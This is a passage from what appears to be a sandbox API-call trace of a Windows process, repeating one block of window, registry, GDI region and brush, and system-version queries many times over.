[0088.218] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.218] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.218] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401d0 [0088.218] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401cd [0088.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104107d [0088.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104107e [0088.218] CombineRgn (hrgnDst=0x104107d, hrgnSrc1=0xa10401d0, hrgnSrc2=0xa30401cd, iMode=1) returned 1 [0088.218] CombineRgn (hrgnDst=0x104107e, hrgnSrc1=0xa10401d0, hrgnSrc2=0xa30401cd, iMode=4) returned 2 [0088.218] CreateSolidBrush (color=0xff) returned 0x210107c [0088.218] CreateSolidBrush (color=0xff0000) returned 0x110107f [0088.218] DeleteObject (ho=0x110107f) returned 1 [0088.218] DeleteObject (ho=0xa30401cd) returned 1 [0088.218] DeleteObject (ho=0xa10401d0) returned 1 [0088.218] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.218] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.218] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.218] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.218] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.218] BeginPath (hdc=0x0) returned 0 [0088.218] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.219] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.219] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.219] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.219] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.219] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.219] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.219] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.219] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401cd [0088.219] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401d0 [0088.219] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041080 [0088.219] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041081 [0088.219] CombineRgn (hrgnDst=0x1041080, hrgnSrc1=0xa40401cd, hrgnSrc2=0xa20401d0, iMode=1) returned 1 [0088.219] CombineRgn (hrgnDst=0x1041081, hrgnSrc1=0xa40401cd, hrgnSrc2=0xa20401d0, iMode=4) returned 2 [0088.219] CreateSolidBrush (color=0xff) returned 0x210107f [0088.219] CreateSolidBrush (color=0xff0000) returned 0x1101082 [0088.219] DeleteObject (ho=0x1101082) returned 1 [0088.219] DeleteObject (ho=0xa20401d0) returned 1 [0088.219] DeleteObject (ho=0xa40401cd) returned 1 [0088.219] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.219] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.219] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.219] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.219] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.219] BeginPath (hdc=0x0) returned 0 [0088.219] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.219] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.219] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.219] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.219] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.219] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.219] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.219] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.219] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401d0 [0088.219] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401cd [0088.219] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041083 [0088.219] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041084 [0088.219] CombineRgn (hrgnDst=0x1041083, hrgnSrc1=0xa30401d0, hrgnSrc2=0xa50401cd, iMode=1) returned 1 [0088.219] CombineRgn (hrgnDst=0x1041084, hrgnSrc1=0xa30401d0, hrgnSrc2=0xa50401cd, iMode=4) returned 2 [0088.220] CreateSolidBrush (color=0xff) returned 0x2101082 [0088.220] CreateSolidBrush (color=0xff0000) returned 0x1101085 [0088.220] DeleteObject (ho=0x1101085) returned 1 [0088.220] DeleteObject (ho=0xa50401cd) returned 1 [0088.220] DeleteObject (ho=0xa30401d0) returned 1 [0088.220] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.220] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.220] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.220] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.220] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.220] BeginPath (hdc=0x0) returned 0 [0088.220] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.220] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.220] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.220] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.220] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.220] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.220] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.220] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.220] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401cd [0088.220] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401d0 [0088.220] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041086 [0088.220] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041087 [0088.220] CombineRgn (hrgnDst=0x1041086, hrgnSrc1=0xa60401cd, hrgnSrc2=0xa40401d0, iMode=1) returned 1 [0088.220] CombineRgn (hrgnDst=0x1041087, hrgnSrc1=0xa60401cd, hrgnSrc2=0xa40401d0, iMode=4) returned 2 [0088.220] CreateSolidBrush (color=0xff) returned 0x2101085 [0088.220] CreateSolidBrush (color=0xff0000) returned 0x1101088 [0088.220] DeleteObject (ho=0x1101088) returned 1 [0088.220] DeleteObject (ho=0xa40401d0) returned 1 [0088.220] DeleteObject (ho=0xa60401cd) returned 1 [0088.220] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.220] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.220] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.220] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.220] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.220] BeginPath (hdc=0x0) returned 0 [0088.220] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.220] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.220] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.220] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.220] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.220] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.221] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.221] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.221] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401d0 [0088.221] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401cd [0088.221] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041089 [0088.221] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104108a [0088.221] CombineRgn (hrgnDst=0x1041089, hrgnSrc1=0xa50401d0, hrgnSrc2=0xa70401cd, iMode=1) returned 1 [0088.221] CombineRgn (hrgnDst=0x104108a, hrgnSrc1=0xa50401d0, hrgnSrc2=0xa70401cd, iMode=4) returned 2 [0088.221] CreateSolidBrush (color=0xff) returned 0x2101088 [0088.221] CreateSolidBrush (color=0xff0000) returned 0x110108b [0088.221] DeleteObject (ho=0x110108b) returned 1 [0088.221] DeleteObject (ho=0xa70401cd) returned 1 [0088.221] DeleteObject (ho=0xa50401d0) returned 1 [0088.221] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.221] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.221] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.221] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.221] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.221] BeginPath (hdc=0x0) returned 0 [0088.221] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.221] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.221] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.221] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.221] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.221] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.221] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.221] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.221] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401cd [0088.221] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401d0 [0088.221] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104108c [0088.221] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104108d [0088.221] CombineRgn (hrgnDst=0x104108c, hrgnSrc1=0xa80401cd, hrgnSrc2=0xa60401d0, iMode=1) returned 1 [0088.221] CombineRgn (hrgnDst=0x104108d, hrgnSrc1=0xa80401cd, hrgnSrc2=0xa60401d0, iMode=4) returned 2 [0088.221] CreateSolidBrush (color=0xff) returned 0x210108b [0088.221] CreateSolidBrush (color=0xff0000) returned 0x110108e [0088.221] DeleteObject (ho=0x110108e) returned 1 [0088.222] DeleteObject (ho=0xa60401d0) returned 1 [0088.222] DeleteObject (ho=0xa80401cd) returned 1 [0088.222] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.222] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.222] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.222] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.222] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.222] BeginPath (hdc=0x0) returned 0 [0088.222] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.222] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.222] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.222] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.222] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.222] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.222] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.222] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.222] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401d0 [0088.222] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401cd [0088.222] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104108f [0088.222] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041090 [0088.222] CombineRgn (hrgnDst=0x104108f, hrgnSrc1=0xa70401d0, hrgnSrc2=0xa90401cd, iMode=1) returned 1 [0088.222] CombineRgn (hrgnDst=0x1041090, hrgnSrc1=0xa70401d0, hrgnSrc2=0xa90401cd, iMode=4) returned 2 [0088.222] CreateSolidBrush (color=0xff) returned 0x210108e [0088.222] CreateSolidBrush (color=0xff0000) returned 0x1101091 [0088.222] DeleteObject (ho=0x1101091) returned 1 [0088.222] DeleteObject (ho=0xa90401cd) returned 1 [0088.222] DeleteObject (ho=0xa70401d0) returned 1 [0088.222] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.222] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.222] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.222] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.222] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.222] BeginPath (hdc=0x0) returned 0 [0088.222] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.223] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.223] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.223] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.223] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.223] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.223] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.223] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.223] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401cd [0088.223] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401d0 [0088.223] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041092 [0088.223] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041093 [0088.223] CombineRgn (hrgnDst=0x1041092, hrgnSrc1=0xaa0401cd, hrgnSrc2=0xa80401d0, iMode=1) returned 1 [0088.223] CombineRgn (hrgnDst=0x1041093, hrgnSrc1=0xaa0401cd, hrgnSrc2=0xa80401d0, iMode=4) returned 2 [0088.223] CreateSolidBrush (color=0xff) returned 0x2101091 [0088.223] CreateSolidBrush (color=0xff0000) returned 0x1101094 [0088.223] DeleteObject (ho=0x1101094) returned 1 [0088.223] DeleteObject (ho=0xa80401d0) returned 1 [0088.223] DeleteObject (ho=0xaa0401cd) returned 1 [0088.223] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.223] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.223] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.223] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.223] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.223] BeginPath (hdc=0x0) returned 0 [0088.223] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.223] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.223] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.223] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.223] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.223] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.223] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.223] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.223] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401d0 [0088.223] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401cd [0088.223] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041095 [0088.223] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041096 [0088.224] CombineRgn (hrgnDst=0x1041095, hrgnSrc1=0xa90401d0, hrgnSrc2=0xab0401cd, iMode=1) returned 1 [0088.224] CombineRgn (hrgnDst=0x1041096, hrgnSrc1=0xa90401d0, hrgnSrc2=0xab0401cd, iMode=4) returned 2 [0088.224] CreateSolidBrush (color=0xff) returned 0x2101094 [0088.224] CreateSolidBrush (color=0xff0000) returned 0x1101097 [0088.224] DeleteObject (ho=0x1101097) returned 1 [0088.224] DeleteObject (ho=0xab0401cd) returned 1 [0088.224] DeleteObject (ho=0xa90401d0) returned 1 [0088.224] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.224] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.224] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.224] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.224] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.224] BeginPath (hdc=0x0) returned 0 [0088.224] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.224] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.224] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.224] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.224] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.224] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.224] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.224] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.224] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401cd [0088.224] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401d0 [0088.224] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041098 [0088.224] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041099 [0088.224] CombineRgn (hrgnDst=0x1041098, hrgnSrc1=0xac0401cd, hrgnSrc2=0xaa0401d0, iMode=1) returned 1 [0088.224] CombineRgn (hrgnDst=0x1041099, hrgnSrc1=0xac0401cd, hrgnSrc2=0xaa0401d0, iMode=4) returned 2 [0088.224] CreateSolidBrush (color=0xff) returned 0x2101097 [0088.224] CreateSolidBrush (color=0xff0000) returned 0x110109a [0088.224] 